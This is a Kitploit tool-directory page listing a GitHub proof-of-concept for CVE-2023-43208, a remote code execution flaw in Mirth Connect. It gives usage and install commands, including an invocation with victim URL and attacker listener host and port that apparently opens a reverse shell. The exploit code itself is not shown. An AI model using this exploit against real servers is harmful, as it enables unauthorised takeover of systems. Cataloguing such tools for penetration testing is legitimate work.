Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-43208-PoC — Explota vulnerabilidad | Kitploit
Tools/GitHubGitHub/humberto-pixel/cve-2023-43208-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubhumberto-pixel/cve-2023-43208-poc

CVE-2023-43208-PoC

Explota vulnerabilidad

View Repository
15 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Mirth Connect RCE Exploit (CVE-2023-43208)

This script is a Proof of Concept (PoC) for the Remote Code Execution (RCE) vulnerability in Mirth Connect (versions prior to 4.4.1). It exploits an XStream deserialization vulnerability through the API.

Requirements

  • Python 3.10 or higher (Compatible with 3.13).
  • Network connectivity to the target.

Tool Usage

root@kitploit:~
python3 CVE-2023-43208.py -u [https://IP-victim] -lh [IP-attacker] -lp [port]

Installation

It is recommended to use a virtual environment:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

#Payload Execution

root@kitploit:~
python3 payload.py
Download Tool